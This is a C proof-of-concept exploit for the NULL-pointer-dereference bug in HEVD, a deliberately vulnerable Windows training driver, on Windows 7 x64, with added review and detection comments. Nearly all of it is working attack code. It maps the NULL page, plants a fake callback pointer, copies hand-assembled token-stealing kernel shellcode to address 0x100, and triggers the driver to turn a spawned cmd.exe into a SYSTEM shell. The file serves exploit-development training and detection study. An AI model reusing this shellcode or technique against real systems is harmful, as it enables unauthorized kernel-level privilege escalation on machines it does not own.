Exploit for NULL Pointer Dereference HEVD
#include "stdafx.h"   /* MSVC precompiled header; expected to bring in windows.h/stdio.h (not visible on this page) */

/* IOCTL code for the HEVD NULL-pointer-dereference handler (function 0x80A).
 * METHOD_NEITHER means the driver receives the caller's user-mode buffer
 * pointer directly and is responsible for validating it itself. */
#define HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x80A, METHOD_NEITHER, FILE_ANY_ACCESS)

/* Function-pointer type for ntdll!ZwAllocateVirtualMemory, which main()
 * resolves at runtime via GetProcAddress rather than linking against it.
 * NOTE(review): the typedef reuses the API's own name; that only works because
 * the real function is never referenced by name anywhere in this file — a
 * suffix such as ZwAllocateVirtualMemory_t would avoid the confusion. */
typedef NTSTATUS(*WINAPI ZwAllocateVirtualMemory)(
    _In_ HANDLE ProcessHandle,
    _Inout_ PVOID *BaseAddress,      /* in: requested base; out: base actually chosen by the kernel */
    _In_ ULONG_PTR ZeroBits,
    _Inout_ PSIZE_T RegionSize,      /* in: requested size; out: size rounded to page granularity */
    _In_ ULONG AllocationType,
    _In_ ULONG Protect
);
/* Kernel-mode payload that runs when the driver follows the callback pointer
 * planted by main(). Hand-assembled x64 machine code: only the leading bytes
 * are instructions, the trailing run of 0xff pads the array to 256 bytes.
 * The four 0x41 bytes at offset 27 are a placeholder that main() overwrites
 * with the PID of the spawned cmd.exe before the array is copied to 0x100.
 * The absolute structure offsets baked into these bytes are tied to the
 * Windows 7 x64 build named in main()'s banner; on any other build they
 * address the wrong fields and the most likely outcome is a kernel crash, not
 * a clean failure.
 * NOTE(review): this is the widely shared HEVD token-stealing stub; for
 * detection purposes the byte pattern is stable apart from the patched PID,
 * so it is a reasonable static signature on hosts where HEVD should never be
 * present. */
char shellcode[256] = {
    0x50, 0x53, 0x51, 0x56, 0x57, 0x65, 0x48, 0x8b, 0x04, 0x25,
    0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x10, 0x02, 0x00,
    0x00, 0x81, 0xb8, 0x80, 0x01, 0x00, 0x00, 0x41, 0x41, 0x41,  /* offset 27..30: PID placeholder */
    0x41, 0x74, 0x0f, 0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x2d, 0x88, 0x01, 0x00, 0x00, 0xeb, 0xe5, 0x48, 0x89,
    0xc3, 0x83, 0xb8, 0x80, 0x01, 0x00, 0x00, 0x04, 0x74, 0x0f,
    0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00, 0x48, 0x2d, 0x88,
    0x01, 0x00, 0x00, 0xeb, 0xe8, 0x48, 0x8b, 0x88, 0x08, 0x02,
    0x00, 0x00, 0x48, 0x89, 0x8b, 0x08, 0x02, 0x00, 0x00, 0x5f,
    0x5e, 0x59, 0x5b, 0x58, 0xc3, 0xff, 0xff, 0xff, 0xff, 0xff,  /* 0xc3 (ret) ends the code; rest is padding */
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
/*
 * Entry point: proof-of-concept against the NULL-pointer-dereference IOCTL of
 * HEVD (HackSys Extreme Vulnerable Driver, a deliberately vulnerable training
 * driver) on Windows 7 x64.
 *
 * Sequence: map the NULL page, open the device, spawn cmd.exe, patch the
 * payload with the child's PID, plant a fake callback pointer at address 0x8
 * and the payload at 0x100, then send the IOCTL.
 *
 * NOTE(review): every failure path returns 0, so the exit status never
 * reflects an error; driverHandle, pi.hProcess and pi.hThread are never
 * closed and live until process exit.
 *
 * Detection: from a monitoring standpoint the observable sequence is a
 * user-mode process committing memory at base address 0, opening
 * \\.\HackSysExtremeVulnerableDriver, and issuing a METHOD_NEITHER IOCTL with
 * a 1 KB all-'A' buffer — each is a reasonable alert on a host that should
 * not have HEVD installed at all.
 */
int main()
{
    printf("HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE Windows 7 x64 exploit\n\t@_xpn_\n\n");

    /* Resolve ntdll!ZwAllocateVirtualMemory at runtime; ntdll is always
     * mapped, so LoadLibraryA only bumps its reference count.
     * NOTE(review): the GetProcAddress result is not checked for NULL and is
     * called through unconditionally below. */
    ZwAllocateVirtualMemory _ZwAllocateVirtualMemory = (ZwAllocateVirtualMemory)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwAllocateVirtualMemory");

    /* A requested base of 1 is rounded down to 0, i.e. the NULL page.
     * Windows 8 and later refuse user-mode allocations in this range, which is
     * why the banner names Windows 7 (presumably with no NULL-page mitigation
     * enabled on the target). */
    PVOID memAddr = (PVOID)1;
    SIZE_T regionSize = 4096;          /* one page; both 0x8 and 0x100 used below fall inside it */
    char exploit[1024];                /* IOCTL input buffer, filled with 'A' further down */
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    /* NOTE(review): si is a STARTUPINFOA but is zeroed with sizeof(STARTUPINFO);
     * the sizes match in an ANSI build, but sizeof si would be consistent with
     * the si.cb assignment below. */
    ZeroMemory(&si, sizeof(STARTUPINFO));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

    printf("[*] Mapping NULL page via ZwAllocateVirtualMemory()\n");
    NTSTATUS alloc = _ZwAllocateVirtualMemory(
        GetCurrentProcess(),
        &memAddr,                      /* in/out: kernel writes back the actual base */
        0,
        &regionSize,                   /* in/out: rounded to page granularity */
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE         /* must be executable: the payload copied to 0x100 runs from here */
    );
    /* Anything other than STATUS_SUCCESS (0) is treated as failure. */
    if (alloc != 0) {
        printf("[!] Error mapping memory\n");
        return 0;
    }
    printf("[*] Success, memory mapped\n");

    printf("[*] Opening handle to device driver\n");
    HANDLE driverHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (driverHandle == INVALID_HANDLE_VALUE) {
        printf("[!] Error opening handle\n");
        return 0;
    }
    /* NOTE(review): driverHandle is never passed to CloseHandle. */
    printf("[*] Handle opened successfully\n");

    printf("[*] Spawning a new cmd.exe process\n");
    si.cb = sizeof(STARTUPINFOA);
    /* The child is created before the IOCTL so its PID is known and can be
     * patched into the payload. CreateProcessA does not modify lpCommandLine
     * (only the W variant may), so passing a casted string literal is tolerated
     * here. `true` relies on C++ (or <stdbool.h>); the Win32 spelling is TRUE. */
    if (!CreateProcessA(
        NULL,
        (LPSTR)"cmd.exe",
        NULL,
        NULL,
        true,                          /* bInheritHandles */
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi
    )) {
        printf("[!] FATAL: Error spawning cmd.exe\n");
        return 0;                      /* NOTE(review): returns with driverHandle still open */
    }
    printf("[*] cmd.exe spawned\n");
    /* NOTE(review): pi.hProcess and pi.hThread are never closed either. */
    Sleep(1000);                       /* presumably gives the new console time to settle; nothing visible here depends on it */

    /* Patch the 4-byte placeholder at offset 27 of the payload with the
     * child's PID.
     * NOTE(review): dwProcessId is a DWORD; the matching format is "%lu", not "%d". */
    printf("[*] Updating our shellcode to search for PID %d\n", pi.dwProcessId);
    *(DWORD *)((char *)shellcode + 27) = pi.dwProcessId;

    /* With the NULL page mapped, the slot at address 0x8 — where the driver
     * expects an object's callback pointer — is under user control; point it
     * at 0x100 and place the payload there. Both writes stay inside the
     * 4096-byte region mapped above. */
    printf("[*] Setting Callback() pointer at 0x08 to point to shellcode\n");
    *(unsigned long long*)0x8 = 0x100;
    printf("[*] Copying shellcode to 0x100\n");
    memcpy((void*)0x100, shellcode, sizeof(shellcode));   /* 256 bytes */

    /* The buffer is deliberately not the value the driver expects, so its
     * object pointer stays NULL when it is dereferenced (inferred from the HEVD
     * source, which is not on this page).
     * NOTE(review): the DeviceIoControl return value is ignored, so a rejected
     * IOCTL is still reported as success by the final printf. */
    printf("[*] Sending IOCTL to trigger exploit\n");
    memset(exploit, 'A', sizeof(exploit));
    DeviceIoControl(
        driverHandle,
        HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE,
        exploit,
        sizeof(exploit),
        NULL,
        0,
        NULL,
        NULL
    );
    printf("[*] Done, enjoy your new system shell :)\n");
    return 0;
}